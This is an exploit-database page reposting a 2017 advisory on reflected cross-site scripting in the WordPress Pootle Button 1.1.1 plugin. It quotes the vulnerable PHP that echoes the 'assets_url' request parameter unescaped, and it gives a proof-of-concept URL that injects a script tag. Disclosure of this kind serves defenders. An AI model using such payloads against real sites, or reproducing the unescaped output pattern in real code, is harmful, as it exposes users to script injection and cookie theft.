Advertisement






WordPress Pootle Button 1.1.1 Cross Site Scripting

CVE Category Price Severity
N/A CWE-79 Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2017-10-13
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017100101

Below is a copy:

WordPress Pootle Button 1.1.1 Cross Site Scripting
Class  Input Validation Error
Remote  Yes
Reflected Yes

Credit Ricardo Sanchez
Vulnerable Pootle button plugin 1.1.1
Pootle button plugin is prone to a cross-site scripting
vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the
browser of an unsuspecting user in the context of the affected site. This
may allow the attacker to steal cookie-based authentication credentials and
to launch other attacks.

To exploit this issue following steps:

The XSS reflected because the "assets_url" value is not filter correcly:

<script src="<?php echo $_GET['assets_url'] . 'alpha-color.js'
?>"></script> <link rel="stylesheet" href="<?php echo $_GET['assets_url'] .
'dashicons-select.css' ?>"> <script src="<?php echo $_GET['assets_url'] .
'dashicons-select.js?v=1.0.1' ?>"></script> Demo url:
*http://localhost/wordpress/wp-admin/admin-ajax.php?action=pbtn_dialog&assets_url=%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3E
<http://localhost/wordpress/wp-admin/admin-ajax.php?action=pbtn_dialog&assets_url=%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3E>*

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum